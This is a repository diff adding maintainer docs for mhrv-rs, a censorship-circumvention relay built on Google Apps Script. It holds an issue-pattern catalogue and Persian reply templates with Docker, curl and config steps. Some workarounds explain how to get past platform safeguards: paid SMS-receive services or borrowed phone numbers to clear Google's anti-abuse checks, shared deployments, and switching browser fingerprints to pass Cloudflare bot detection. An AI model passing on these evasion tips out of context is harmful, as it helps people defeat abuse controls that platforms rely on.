v1.8.1 over-asserted; v1.8.3 explicitly enumerates because we learned to. + +## What v1.8.x roadmap is doing about this + +- **Per-script_id error-category counter** — surface in CLI/UI: "deployment AKfycbz1: 95% success, 4% timeout, 1% quota, 0% auth_mismatch over last 5 min". Lets users diagnose without flipping DIAGNOSTIC_MODE. +- **Distinct error categories in client logs** — separate AUTH_KEY mismatch / timeout / quota / ISP truncation / Persian quota / Workspace landing into 6 distinct error log lines. Currently merged. +- **AIMD per-deployment auto-throttle** — automatically lower `parallel_concurrency` for deployments that hit quota too often. Find the sustainable rate per deployment without manual tuning. + +These are queued for v1.8.x batch (~2-4 weeks). diff --git a/docs/maintainer/references/issue-patterns.md b/docs/maintainer/references/issue-patterns.md new file mode 100644 index 00000000..87dd77b5 --- /dev/null +++ b/docs/maintainer/references/issue-patterns.md @@ -0,0 +1,327 @@ +# Issue patterns + +The repo gets the same ~15 issues over and over with different wrappers. Recognizing the pattern fast is most of the maintenance job. Each section below covers: the symptoms users describe, what's actually happening, how to diagnose, and the canonical reply structure. + +## Pattern 1: AUTH_KEY mismatch (the v1.8.0 decoy body) + +**Symptoms**: +- `502 Relay error: bad response: no json in: ...The script completed but did not return anything` +- v1.8.1+ logs say `got the v1.8.0 bad-auth decoy` (now soft-language in v1.8.3) +- Issue title often "502 error", "خطای 502", "ارور relay", or "no json in batch response" +- Often combined with: "MITM mode works but Full mode doesn't" (CodeFull.gs has different AUTH_KEY than Code.gs) + +**Root cause**: The `AUTH_KEY` constant in `Code.gs` (or `CodeFull.gs`) on Apps Script doesn't match the `auth_key` field in mhrv-rs `config.json`. Apps Script returns the v1.8.0 decoy HTML. 
+ +**The hidden killer**: Apps Script does NOT auto-pickup edits to deployed scripts. Editing `const AUTH_KEY = "..."` in the Apps Script editor and clicking Save does nothing for the deployed version. The user must: + +1. Apps Script web editor → **Deploy → Manage Deployments** +2. Click the deployment → pencil/Edit +3. Version dropdown → **New version** +4. Click Deploy + +This redeploys with the new AUTH_KEY. Most users skip this and stay on the old version. + +**Diagnostic procedure**: + +Tell the user to flip `DIAGNOSTIC_MODE = true` at the top of `Code.gs` / `CodeFull.gs`, redeploy as new version, and re-test: + +- If they still see the same decoy body → it's NOT AUTH_KEY mismatch (one of the other 5 candidate causes — see `diagnostic-taxonomy.md`) +- If they see explicit JSON `{"e":"unauthorized"}` → confirmed AUTH_KEY mismatch; align values + redeploy as new version + +**Canonical reply structure** (from #414 thread): + +1. Confirm the symptom matches the v1.8.x decoy detection +2. Walk through the 6 candidate causes and explain why AUTH_KEY mismatch is most likely for their case +3. Detail the redeploy-as-new-version steps with exact UI clicks +4. Suggest the DIAGNOSTIC_MODE flip as the disambiguator +5. Close with link to `diagnostic-taxonomy.md`-equivalent context + +## Pattern 2: TUNNEL_AUTH_KEY env var name confusion (Full mode) + +**Symptoms**: +- User on Full mode, Docker container set up +- `docker logs mhrv-tunnel` shows `tunnel_auth_key not set, using defaults` +- Or: AUTH_KEY mismatch errors in mhrv-rs that the user "definitely" set correctly +- Often Persian-language issue (matches Iranian VPS user demographic) + +**Root cause**: User typed `MHRV_AUTH_KEY` (wrong, this is what some old docs said), `Tunnel` (wrong, partial match), `tunnel_auth_key` (wrong, lowercase), `TUNNEL-AUTH-KEY` (wrong, dash instead of underscore), or skipped the env var entirely. + +The literal env var name is **`TUNNEL_AUTH_KEY`** — uppercase, three underscored words. 
+ +**Diagnostic command**: +```bash +docker exec mhrv-tunnel env | grep TUNNEL_AUTH_KEY +``` + +Should print: `TUNNEL_AUTH_KEY=`. If empty, the env var wasn't set during `docker run`. + +**Canonical fix**: +```bash +docker stop mhrv-tunnel +docker rm mhrv-tunnel + +docker run -d --name mhrv-tunnel \ + --restart unless-stopped \ + -p 8443:8443 \ + -e TUNNEL_AUTH_KEY="" \ + ghcr.io/therealaleph/mhrv-tunnel-node:latest +``` + +Then in `CodeFull.gs`, `const TUNNEL_AUTH_KEY = ""` must match. Redeploy as new version. + +**Related: port mismatch**. If `docker run` used `-p 8443:8080` or similar mapping, the curl test must use the external port. Check with `docker port mhrv-tunnel`. + +## Pattern 3: Iran ISP throttle (#313) + +**Symptoms**: +- 504 timeouts, intermittent connection drops +- "Worked yesterday, broken today" +- "Mobile data works but home Wi-Fi doesn't" (or vice versa) +- TLS handshake timeouts during SNI rotation pool tests +- All sites slow, not specific to one destination + +**Root cause**: Iran's ISP infrastructure (especially TCI/مخابرات, less so MCI/همراه) actively RST-injects mid-stream into TLS connections destined for specific Google IPs. This is targeted at Apps Script outbound, not generic Google access. The throttle has plus-and-minus periods — sometimes off for hours, sometimes on for days. Was particularly aggressive starting late April 2026. + +**Direct curl test** (the gold-standard diagnostic): +```bash +curl -L -X POST 'https://script.google.com/macros/s//exec' \ + -H 'Content-Type: application/json' \ + -d '{"k":"","u":"https://httpbin.org/get","m":"GET"}' \ + --max-time 30 -w "\ntime: %{time_total}s\n" +``` + +Run 5-10 times. If majority timeout/RST → ISP throttle confirmed. If majority succeed → it's mhrv-rs path or config. + +**Workarounds** (in roughly the order to try): +1. Upgrade to latest version (each release tends to add diagnostics + small mitigations) +2. 
`disable_padding: true` in config (~25% bandwidth savings, helps under throttle) +3. Rotate `google_ip` to a different IP from the SNI pool (some IPs filtered, others not, varies by ISP and week) +4. Switch network (mobile data often less throttled than home Wi-Fi) +5. Multiple `script_ids` in config — rotation helps when individual deployments are mid-throttle +6. Full mode + non-Iranian VPS (Hetzner/Contabo/OVH or Iranian-VPS-broker like Parspack selling German VPS) + +**Don't promise a fix**. The ISP throttle is upstream of anything we can ship. Acknowledge it, list workarounds, point at #313 as the canonical thread. + +## Pattern 4: Apps Script self-loop restriction (Google services blocked) + +**Symptoms**: +- "cloud.google.com gives 403" +- "Can't access Gmail / Meet / Drive / Colab / Gemini" +- "google.com loads but mail.google.com doesn't" +- "YouTube video player shows error" (different — this is SABR cliff #300) + +**Root cause**: Google explicitly blocks `UrlFetchApp.fetch()` calls to `*.google.com`, `*.googleapis.com`, `*.gstatic.com`, `*.googleusercontent.com`. This is hardcoded into Google's API to prevent Apps Script from being abused as an internal Google proxy. **No HTTP-relay-on-Apps-Script architecture can fix this.** + +**No workaround in apps_script mode**. This is permanent. + +**Workaround for users with VPS in Full mode**: dual-routing in xray. Their xray client (or v2ray, etc.) routes Google domains direct from their VPS, everything else through mhrv-rs. See #420 for the canonical thread with config snippets. + +**Canonical reply**: explain the architectural limit, list the affected sites, point at #420 for the dual-VPS workaround. Close as duplicate of #420 if it's a clean duplicate. 
+ +## Pattern 5: SABR cliff (#300) — YouTube video doesn't play + +**Symptoms**: +- "YouTube loads but video doesn't play" +- "This content isn't available" +- "Playback error" / "An error occurred" +- "Short videos work, long ones don't" + +**Root cause**: Apps Script's 30-second response cap. YouTube's SABR streaming protocol expects long-lived response streams. After ~30s the stream gets cut by Apps Script and the video player errors out. Page HTML/JS loads fine (small, fits in window). Video stream doesn't. + +**Workarounds**: +- Short videos (<1 min) often work +- Lowest quality (144p/240p) sometimes squeaks past +- YouTube web in Chrome/Firefox (browsers use user trust store on Android, YouTube app doesn't) > YouTube app +- NewPipe (Android, F-Droid) sometimes works better than official app +- Full mode + VPS (definitive — bytes flow through TCP tunnel, not Apps Script's response window) + +v1.9.0 xmux roadmap aims to mitigate by splitting streams across multiple deployments. Won't fully resolve. + +**Canonical reply**: explain SABR cliff, list workarounds, close as duplicate of #300 if pure duplicate. + +## Pattern 6: Android user trust store + +**Symptoms**: +- "Browser works but YouTube/Telegram/Instagram apps don't" +- "VPN is on but apps don't go through mhrv-rs" +- "How do I make Gmail app work?" + +**Root cause**: Android has two CA trust stores — system (factory-installed CAs) and user (user-installed CAs via Settings → Security → Install certificate). Since Android 7.0 (2016), most apps default to system-only. The mhrv-rs MITM CA installs to user trust store; system trust requires root. + +**Apps that work via mhrv-rs on Android**: Chrome, Firefox, Edge, Brave (browsers explicitly opt in to user trust). Most desktop-class apps that delegate to system browser. + +**Apps that don't work**: YouTube app, Gmail app, Maps, Instagram, Twitter/X, banking apps, any app shipped with strict TLS pinning. They use system trust + don't see mhrv-rs. 
+ +**Workarounds**: +- Use web versions (`youtube.com` in Chrome instead of YouTube app) +- Root + Magisk + MagiskTrustUserCerts module migrates user CA to system +- Full mode + VPS (bytes don't flow through MITM, so trust isn't needed for arbitrary apps; v2ray/xray on VPS handles routing) + +**Canonical reply**: explain user/system trust store distinction, list which apps work, give the three workarounds. This is FAQ-tier — should eventually be in `docs/faq/android.md`. + +## Pattern 7: Cloudflare CAPTCHA / 403 + +**Symptoms**: +- "Most CF-protected sites block me" +- "ChatGPT shows captcha I can't solve" +- "Cloudflare checking your browser..." stuck + +**Root cause**: All mhrv-rs traffic exits via Google data center IPs (Apps Script's outbound). Cloudflare's bot detection flags traffic from Google IPs to consumer-facing sites as suspicious — looks like a scraper/bot, not a person. Result: aggressive CAPTCHA, sometimes outright 403. + +**Workarounds** (limited): +- Solve interactive CAPTCHA when shown — the resulting token works for hours +- Different browser fingerprints sometimes pass (Brave, Tor) +- Full mode + VPS — VPS exits with its own (residential-adjacent) IP, often not flagged +- Cloudflare WARP integration is on the v1.9.x roadmap (#309) but feasibility uncertain + +**Canonical reply**: explain why (Google IP exit), list workarounds, point at #382 (canonical Cloudflare thread) and #309 (WARP roadmap). + +## Pattern 8: Apps Script account suspension / phone-required + +**Symptoms**: +- "Action required" notifications on Google account +- "Phone number must be added" +- Deployment intermittently returns Persian Workspace landing HTML (`پردازش کلمه وب...`) +- Sometimes resolves on its own; sometimes escalates to suspension + +**Root cause**: Google's anti-abuse system flags new Google accounts (especially phone-less ones) within hours of deploying automation-pattern code. 
The progression is: warning → soft restriction (Workspace landing HTML on UrlFetchApp calls) → full suspension. + +**Workarounds**: +1. Add a phone number to the account (most reliable). Iranian phones often filtered by Google's verification; user might need a friend's foreign number, TextNow, paid SMS-receive service, or shared phone +2. Use established phone-verified accounts (own main Gmail, family/friends' main accounts) — multi-year-old accounts with normal usage history are very rarely flagged +3. Workflow #325 — community shared deployments (one user with stable account hosts the deployment, others use the deployment ID + shared AUTH_KEY) + +**Risk levels** (approximate, from observed reports): +- Phone-verified personal Gmail, single deployment, light use → low risk +- Phone-verified, multiple deployments under same account → medium risk +- New no-phone account, any usage → high risk +- Old established account, single deployment → very low risk + +No confirmed cases of full Google account ban (Gmail deletion, Drive loss). Suspensions are scoped to Apps Script + UrlFetchApp. + +## Pattern 9: Telegram / VoIP / "app doesn't work in Full mode" + +**Symptoms**: +- "Can I add Telegram support?" +- "WhatsApp/Skype voice calls don't work" +- "Need a port for Telegram" + +**Root cause**: Telegram uses MTProto (custom UDP-ish protocol). WhatsApp/Skype/FaceTime voice/video use WebRTC (UDP STUN/TURN). Apps Script's `UrlFetchApp` is HTTP/HTTPS only — **cannot carry UDP or non-HTTP protocols by design.** + +**Workarounds**: +- **Telegram messaging**: web.telegram.org through mhrv-rs Chrome (HTTPS, works) +- **Telegram MTProto proxy**: use a public MTProto proxy from Telegram channels (free, unreliable) or self-host on VPS +- **Voice/video calls**: only via Full mode + VPS + xray UDP-enabled routing — bytes route direct from VPS to upstream, not through Apps Script + +Architectural ceiling — can't be fixed in mhrv-rs core. 
+ +## Pattern 10: Config file confusion (config.json vs scan_config.json) + +**Symptoms**: +- "I followed instructions but it doesn't import the config" +- User pastes a config that has `google_ips`, `max_ips_to_scan`, `scan_batch_size`, `google_ip_validation` fields +- Says "the program doesn't pick up my config" + +**Root cause**: User confused `config.json` (main runtime config — `script_ids`, `auth_key`, `google_ip`, `mode`, etc.) with `scan_config.json` (input for `mhrv-rs scan-ips` diagnostic command — Google IP discovery). + +**Fix**: explain the two files, point at `config.example.json` in repo root for the right template. + +Common related typos: +- `script_id` (singular) instead of `script_ids` (plural array) — mhrv-rs parses as 0 deployments and falls back +- `mode: "fullmode"` or `"full_mode"` instead of `"full"` (or `"apps_script"`) + +## Pattern 11: Windows OpenGL renderer fail + +**Symptoms**: +- `Error: Glutin(Error { ... NotSupported("extension to create ES context with wgl is not present") })` +- `Error: Wgpu(NoSuitableAdapterFound)` +- run.bat fails twice (Glow then wgpu fallback) and exits + +**Root cause**: User's Windows lacks OpenGL 2.0+ AND lacks DX12/Vulkan-compatible GPU. Causes: old GPU (Intel HD 2500/3000-era), running in VM without GPU acceleration, RDP session, missing/corrupt graphics drivers. + +**Workaround**: use the CLI binary `mhrv-rs.exe` directly. Put `config.json` in the same folder, double-click `mhrv-rs.exe`, set browser proxy to `127.0.0.1:8086`. Same functionality, no UI. + +v1.8.x roadmap: improve `run.bat` to auto-fallback to CLI when both UI renderers fail. + +## Pattern 12: VPS / Full mode setup questions + +**Symptoms**: +- "How do I set up VPS?" +- "Does the VPS need to be reachable from Iran?" +- "Which provider should I buy?" +- "Step-by-step please" + +**Canonical answer**: VPS does NOT need to be reachable from Iran (Apps Script proxies the path). 
Recommended providers: + +- **Direct purchase from Iran**: difficult — Hetzner needs VAT ID +- **Iranian reseller**: Parspack ([parspack.com/vps](https://parspack.com/vps)), Iranserver, Hostiran sell German VPS via Iranian payment with mark-up (~20-40% over direct) +- **Outside Iran**: Hetzner Falkenstein DE, Contabo DE, OVH SYS — direct euro/dollar payment + +Specs: 1 vCPU, 1 GB RAM, 25 GB SSD, 50+ Mbps unmetered → ~$3-5/month direct or ~250-500k toman/month via reseller for personal use. For 5+ devices + Instagram smooth: 2-4 GB RAM, 100 Mbps unmetered. + +Setup walkthrough: see `tunnel-node/README.md` and `tunnel-node/README.fa.md` (Persian). + +## Pattern 13: Iranian VPS provider bandwidth-cap appliance + +**Symptoms** (rare but observed): +- Persian "exceeded bandwidth quota" HTML response from user's own tunnel-node URL +- Mixed success/failure on same `script_id` + +**Root cause** (provisional — confirmed only when VPS is on Iranian provider): Iranian VPS providers enforce monthly bandwidth quotas at the upstream router/load-balancer layer. When tripped, they intercept traffic and serve a Persian quota landing page **upstream** of the user's Docker container. Container itself never sees the request during quota events. + +**Note**: Several users have reported this where the VPS turned out to be at Hetzner DE (not Iranian) — in which case the Persian body is actually Apps Script's own localized soft-quota response (cause #5 in the diagnostic taxonomy). Always confirm the VPS provider before assuming. + +**Workarounds**: +1. Upgrade plan if provider has a higher tier +2. Move to non-Iranian VPS (Hetzner/Contabo/OVH unmetered) +3. 
Client-side bandwidth optimizations: `disable_padding`, lower `parallel_concurrency`, DNS bypass (v1.8.3+) + +## Pattern 14: Account locale → Persian Apps Script error pages + +**Symptoms**: +- Apps Script's response body comes back as Persian HTML (Workspace landing page or quota page) +- User on Hetzner/non-Iranian VPS +- Their Google account is set to fa-IR locale OR request originates from Iranian IP through some leg + +**Root cause**: Apps Script localizes its system error/placeholder pages based on the deploying account's locale and (sometimes) request-origin IP. Persian-locale account → Persian error pages. This is independent of the user's geographic location running mhrv-rs. + +**Disambiguator**: `DIAGNOSTIC_MODE = true` in Code.gs. If still see Persian body → it's NOT AUTH_KEY mismatch (which gets replaced with explicit JSON in diagnostic mode). It's Apps Script's own quota/state response. + +This is the "5th candidate cause" in the diagnostic taxonomy and the "6th candidate cause" if you separate "Workspace landing HTML for account-flagged deployments" from "Persian quota body for healthy deployments under quota tear". + +## Pattern 15: Download large files / IDM workaround + +**Symptoms**: +- "Downloads stick at 1-10 MB" +- "Need to download a 1 GB file, IDM gets partial only" + +**Root cause**: 30s response cliff again. For 10 MB files at typical Apps Script throughput, 30s is enough. For 1 GB, would need 200+ seconds — hopeless. 
+ +**Workarounds**: +- IDM's multi-segment download with 5 MB segments — each segment fits inside 30s window +- Full mode + VPS — bytes flow through TCP tunnel, not constrained +- v1.8.x roadmap: range-aware splicing in Code.gs to natively support `Range:` requests + +## Quick triage table + +When a new issue lands, scan for these keywords to map fast: + +| Keywords | Pattern | +|----------|---------| +| `502`, `decoy`, `no json in batch`, `script completed but did not return` | 1 (AUTH_KEY mismatch) | +| `tunnel_auth_key not set`, `MHRV_AUTH_KEY`, `Tunnel_Auth_Key`, `docker logs mhrv-tunnel` | 2 (TUNNEL_AUTH_KEY confusion) | +| `504`, `timeout`, `Apps Script unresponsive`, `Connection reset`, `RST`, "yesterday worked" | 3 (Iran ISP throttle #313) | +| `cloud.google.com`, `colab`, `gmail`, `meet`, `gemini`, `drive` not loading | 4 (self-loop restriction → #420) | +| `YouTube video doesn't play`, `This content isn't available`, `playback error` | 5 (SABR cliff → #300) | +| Android, `Gmail app`, `YouTube app`, `Telegram`, "browser works but apps don't" | 6 (user trust store) | +| `Cloudflare`, `captcha`, `403 Forbidden`, "checking your browser" | 7 (CF bot detection → #382) | +| `Google account`, `phone required`, `action required`, `suspension`, `Workspace landing` | 8 (account flag) | +| `Telegram support`, `WhatsApp call`, `Skype`, `voice call`, `video call` | 9 (UDP/MTProto architectural) | +| Config has `google_ips`, `scan_batch_size`, `max_ips_to_scan` | 10 (scan_config confusion) | +| `egui_glow`, `OpenGL`, `wgl`, `Wgpu(NoSuitableAdapterFound)`, `run.bat` | 11 (Windows OpenGL → CLI) | +| `VPS`, `Hetzner`, `Parspack`, `setup help`, "step by step VPS" | 12 (Full mode setup) | +| `سهمیه پهنای باند`, `bandwidth quota`, Iranian VPS provider | 13 (provider appliance) | +| Persian HTML body in error log + non-Iranian VPS | 14 (account locale) | +| `IDM`, `download stuck`, `large file`, `1 GB download` | 15 (range/cliff) | + +If the issue doesn't fit any pattern, it's 
worth reading carefully — these are the genuine new bugs. diff --git a/docs/maintainer/references/persian-templates.md b/docs/maintainer/references/persian-templates.md new file mode 100644 index 00000000..932dcd76 --- /dev/null +++ b/docs/maintainer/references/persian-templates.md @@ -0,0 +1,439 @@ +# Persian reply templates + +These are starting templates for the highest-frequency Persian-language replies. Don't use them verbatim — adapt to the specific user's log lines, config, and report. They exist to prevent re-deriving common phrasings each time and to keep the project's Persian voice consistent across replies. + +The conventions throughout assume: +- Polite professional register (`می‌فرمایید` over `می‌گی`, full pronouns) +- Half-spaces (ZWNJ, `‌`) in compound words +- Latin-script for technical terms inline with Persian particles +- Persian numerals optional in prose (`۲۰،۰۰۰` or `20,000` both fine — match the user) +- Code blocks always in Latin +- Reply marker (Latin) at end + +## Template 1: AUTH_KEY mismatch (with redeploy-as-new-version walkthrough) + +For users showing the v1.8.x decoy detection log line: + +```markdown +این `502` با body `The script completed but did not return anything` دقیقاً همان pattern decoy detection است که در v1.8.x اضافه شد. شش علت ممکن (per v1.8.3 taxonomy) داره ولی محتمل‌ترین برای case شما **AUTH_KEY mismatch** است. + +**نکته بسیار مهم که اکثر کاربران نمی‌دونند:** + +اگر AUTH_KEY رو در Code.gs ویرایش کرده‌اید **بعد از deployment اولیه**، Apps Script اتومات edit رو در deployment موجود pick-up نمی‌کنه. لازمه که **redeploy as new version** کنید: + +1. در Apps Script web editor بازش کنید +2. Deploy → **Manage Deployments** (نه Deploy → New deployment) +3. روی **deployment موجود** کلیک کنید → پنسیل (Edit) +4. در dropdown **Version** → **New version** انتخاب کنید (نه "Head") +5. Description بنویسید (مثلاً "AUTH_KEY update") +6. 
**Deploy** کلیک کنید + +URL deployment همون می‌مونه ولی الان Apps Script کد جدید با AUTH_KEY جدید رو serve می‌کنه. + +**Diagnostic سریع برای تأیید AUTH_KEY mismatch:** + +در بالای Code.gs این خط رو پیدا کنید: + +`const DIAGNOSTIC_MODE = false;` + +تغییر دهید به: + +`const DIAGNOSTIC_MODE = true;` + +سپس **redeploy as new version** کنید (مثل بالا). سپس test: + +- اگر **هنوز decoy body همون** برمی‌گرده → علت **NOT** AUTH_KEY mismatch است (یکی از سایر ۵ علت) +- اگر **JSON `{"e":"unauthorized"}` صریح** برمی‌گرده → بله، AUTH_KEY mismatch — fix رو با aligning AUTH_KEY در config.json با Code.gs انجام دهید + redeploy as new version + +بعد از debug کامل، DIAGNOSTIC_MODE رو به `false` برگردونید + redeploy. در production این flag رو false نگه می‌داریم چون decoy body anti-fingerprinting protection محسوب می‌شه. + +نتیجه DIAGNOSTIC_MODE flip + پیغام دقیق error بعد از redeploy رو share کنید + می‌تونیم narrow کنیم. + +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Template 2: TUNNEL_AUTH_KEY exact spelling + +For users showing `tunnel_auth_key not set, using defaults` in `docker logs mhrv-tunnel`: + +```markdown +مشکلت یادم نرفته! `tunnel_auth_key not set, using defaults` در log‌ها یعنی **اسم env variable هنوز اشتباه است**. 
می‌خوام دقیق‌تر توضیح بدم چون اسم env vars خیلی sensitive هست: + +**اسم env variable باید دقیقاً این باشد** (نه چیز دیگه‌ای، نه شبیه به این): + +``` +TUNNEL_AUTH_KEY +``` + +- **همه‌ش حروف بزرگ** +- **با underscore (`_`) بین کلمات** — نه فاصله، نه dash +- **سه قسمت**: `TUNNEL` + `_` + `AUTH` + `_` + `KEY` + +**اشتباهات رایج که `tunnel_auth_key not set` می‌ده:** + +| اشتباه | چرا کار نمی‌کنه | +|--------|-----------------| +| `Tunnel` یا `tunnel` (تنها) | اسم کامل نیست، tunnel-node این رو نمی‌خونه | +| `Tunnel_Auth_Key` یا `tunnel_auth_key` (lowercase/mixed) | env vars در Linux/Docker case-sensitive هستن | +| `TUNNEL-AUTH-KEY` (با dash) | باید underscore باشه نه dash | +| `MHRV_AUTH_KEY` | اشتباه قدیمی، tunnel-node این رو نمی‌خونه | + +**دستور docker run درست — کپی exact:** + +```bash +ssh root@your-vps-ip +docker stop mhrv-tunnel +docker rm mhrv-tunnel + +docker run -d --name mhrv-tunnel \ + --restart unless-stopped \ + -p 8443:8443 \ + -e TUNNEL_AUTH_KEY="your-secret-here" \ + ghcr.io/therealaleph/mhrv-tunnel-node:latest +``` + +به‌جای `your-secret-here` همون مقداری که در CodeFull.gs گذاشتید بنویسید. + +**verify بعد از start:** + +```bash +docker exec mhrv-tunnel env | grep TUNNEL_AUTH_KEY +``` + +اگر خروجی این باشه: +``` +TUNNEL_AUTH_KEY=your-secret-here +``` +درسته. اگر هیچ خروجی نداد یا خروجی متفاوت بود، دستور `docker run` با اسم اشتباه اجرا شده. + +نتیجه + خروجی `docker exec` رو share کنید + اگر همچنان مشکل بود narrow می‌کنیم. + +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Template 3: #313 ISP throttle (for "504 timeout" reports) + +For users with intermittent timeouts that look like ISP throttle: + +```markdown +این الگو با [#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313) (Iran ISP throttle Apps Script outbound) match می‌کنه. throttle این هفته در حال پلاسی بوده — گاهی off می‌شه ساعتی، گاهی روزی. 
+
+**Diagnostic سریع — direct curl test:**
+
+```bash
+curl -L -X POST 'https://script.google.com/macros/s/YOUR_DEPLOYMENT_ID/exec' \
+  -H 'Content-Type: application/json' \
+  -d '{"k":"YOUR_AUTH_KEY","u":"https://httpbin.org/get","m":"GET"}' \
+  --max-time 30 -w "\ntime: %{time_total}s\n"
+```
+
+اجرا کنید ۵-۱۰ بار. اگر:
+
+- اکثرشون timeout/RST می‌گیرن = #313 ISP throttle (شبکه شما Apps Script رو filter می‌کنه)
+- اکثرشون JSON برمی‌گردونن = مشکل از path mhrv-rs است (config، auth_key، یا غیره)
+
+**Workaround احتمالی برای ISP throttle:**
+
+۱. **به نسخه v1.8.3 (الان موجود) ارتقا دهید:**
+   - دانلود از [GitHub Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases) یا کانال Telegram (`mhrv_rs`)
+   - شامل DoH bypass، H1 keepalive، 6-cause error detection
+
+۲. **`disable_padding: true` در config:**
+
+```json
+{
+  "disable_padding": true,
+  ...
+}
+```
+
+~۲۵٪ bandwidth کم‌تر، در شبکه‌های throttle شده compounds رو کم می‌کنه.
+
+۳. **`google_ip` متفاوت تست کنید** — default `216.239.38.120` ممکنه روی شبکه شما filter شده + یکی دیگه از pool reachable است. لیست pool در `src/domain_fronter.rs` `DEFAULT_GOOGLE_SNI_POOL`.
+
+۴. **شبکه عوض کنید** — همراه/MCI کم‌ترین throttle داره معمولاً. اگر روی Wi-Fi مخابرات هستید، با موبایل دیتا تست کنید.
+
+۵. **چند `script_ids` داشته باشید** — اگر یک deployment quota tear گرفته یا throttle شده، rotation کار می‌کنه. حداقل ۳-۵ deployment.
+
+۶. **اگر VPS دارید** — Full mode رو امتحان کنید (راهنما [tunnel-node README فارسی](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/tunnel-node/README.fa.md)). ISP throttle Apps Script outbound روی Full mode اعمال نمی‌شه.
+
+نتیجه v1.8.3 + curl test + log رو share کنید + می‌تونیم narrow کنیم.
+
+---
+[reply via Anthropic Claude | reviewed by @therealaleph]
+```
+
+## Template 4: VPS setup (Full mode) walkthrough
+
+For "how do I set up VPS?" questions:
+
+```markdown
+**Q: آیا VPS باید مستقیم از Iran قابل دسترسی باشه؟**
+
+**کوتاه: نه.** VPS لازم نیست از Iran direct reachable باشه. این مزیت architectural mhrv-rs Full mode است. 
+ +مسیر traffic: + +``` +Phone (Iran) → mhrv-rs client (Iran) → Apps Script (via Google IP fronting) → + Apps Script's UrlFetchApp → + VPS tunnel-node container → + upstream internet +``` + +دقت کنید: **مسیر از Iran به VPS از طریق Apps Script می‌گذره**. پس: + +- Iran ISP فقط TLS traffic به Google IPها می‌بینه (`216.239.38.120` و سایر) — مثل HTTPS عادی به Google +- Apps Script (در Google data center، US/EU) به VPS شما call می‌کنه +- VPS شما فقط traffic از Google IP می‌گیره (Apps Script's outbound) + +پس حتی اگر VPS IP از Iran ISP filter شده باشه، **مهم نیست** چون هیچ Iran connection direct به VPS نمی‌ره. + +**Setup گام‌به‌گام:** + +**۱. خرید VPS:** + +- اگر می‌توانید Hetzner direct: ~€۴.۵۰/ماه از Falkenstein DE — [hetzner.com/cloud](https://www.hetzner.com/cloud) +- اگر VAT ID نیست: Parspack ([parspack.com/vps](https://parspack.com/vps)) واسطه‌ی آلمانی فروش می‌کنه با ~۲۵۰-۵۰۰ هزار تومان/ماه + +specs توصیه شده: +- شخصی: 1 vCPU، 1 GB RAM، 25 GB SSD، 50+ Mbps unmetered +- خانوادگی (۵+ device + Instagram smooth): 2-4 GB RAM، 100 Mbps unmetered + +**۲. Docker install:** + +```bash +ssh root@your-vps-ip +apt update && apt upgrade -y +apt install -y docker.io +systemctl enable --now docker +docker --version # verify +``` + +**۳. tunnel-node container run:** + +```bash +docker run -d --name mhrv-tunnel \ + --restart unless-stopped \ + -p 8443:8443 \ + -e TUNNEL_AUTH_KEY="your-secret-here" \ + ghcr.io/therealaleph/mhrv-tunnel-node:latest +``` + +**اسم env var دقیقاً `TUNNEL_AUTH_KEY` ست** — uppercase، با underscore. هر deviation در default `changeme` می‌افته + بعداً mismatch می‌سازه. + +برای ساخت secret تصادفی: +```bash +openssl rand -hex 32 +``` + +**۴. firewall:** + +```bash +sudo ufw allow 8443/tcp +sudo ufw allow ssh +sudo ufw enable +``` + +**۵. 
verify direct از خود VPS:** + +```bash +curl -X POST 'http://localhost:8443/tunnel' \ + -H 'Content-Type: application/json' \ + -d '{"k":"YOUR_TUNNEL_SECRET","op":"connect","host":"www.google.com","port":443}' \ + --max-time 10 +``` + +باید JSON success برگرده. اگر نه، tunnel-node container start نشده. + +**۶. CodeFull.gs setup:** + +در [`assets/apps_script/CodeFull.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/CodeFull.gs) محتوا رو copy کنید + در script.google.com یک پروژه جدید ایجاد کنید + paste کنید. + +بالای فایل تنظیم کنید: + +```js +const AUTH_KEY = "your-mhrv-auth-key"; +const TUNNEL_URL = "http://YOUR_VPS_IP:8443/tunnel"; +const TUNNEL_AUTH_KEY = "your-tunnel-secret-here"; // match با docker run -e +``` + +سپس **Deploy → New deployment → Web App → Execute as: Me + Who has access: Anyone → Deploy**. URL deployment رو copy کنید + ID بخشش رو بردارید. + +**۷. mhrv-rs config:** + +```json +{ + "mode": "full", + "auth_key": "your-mhrv-auth-key", + "script_ids": ["YOUR_DEPLOYMENT_ID"] +} +``` + +**`script_ids` plural با s** — این یک typo رایجه که config رو 0-deployment می‌کنه. + +**۸. Connect + verify:** + +mhrv-rs رو start کنید + log باید نشون بده: + +``` +INFO batch: 1 ops → AKfyc..., rtt=Xs ← good +INFO tunnel session abc1234... opened for ...:443 ← good +``` + +اگر `ERROR batch failed: got the v1.8.0 bad-auth decoy` می‌گیرید، AUTH_KEY mismatch است (gam ۶ check کنید). + +اگر `Connection refused` به VPS، firewall بسته است (gam ۴ بررسی کنید). + +برای فارسی-language راهنما با تصاویر [tunnel-node README فارسی](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/tunnel-node/README.fa.md) رو ببینید. + +اگر در گامی fail کرد، error log + خروجی command رو share کنید + می‌تونیم narrow کنیم. 
+ +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Template 5: Account suspension / phone-required (for "action required" reports) + +For users reporting Google account flag or "action required" notifications: + +```markdown +این الگو شناخته‌شده‌ست + در اساس Google's anti-abuse system فلاگ می‌کنه new accounts که immediately Apps Script deployment می‌سازن (مخصوصاً بدون phone verification). + +**Stage تشخیص account flag:** + +``` +Stage 1: "Action required - add phone number" + ↓ (phone اضافه می‌شه) → account stable + ↓ (phone اضافه نمی‌شه + automation activity ادامه می‌ده) + ↓ +Stage 2: "Account temporarily restricted" + ↓ (Apps Script deployments شروع می‌کنن Workspace landing HTML برگردونن + ↓ به‌جای execute کردن — see #421 + cause #6 در v1.8.3 detection) + ↓ +Stage 3: "Account suspended" — full lockout، deployments fail +``` + +شما الان در Stage 1. اگر زود phone verify کنید، account stable می‌مونه + deployments بدون مشکل ادامه می‌دن. + +**برای فکر شما درباره ban Google account کلی:** + +در history reports این پروژه (~۵۰+ کاربر در طول سال گذشته)، **هیچ confirmed case full account ban** ندیدم. 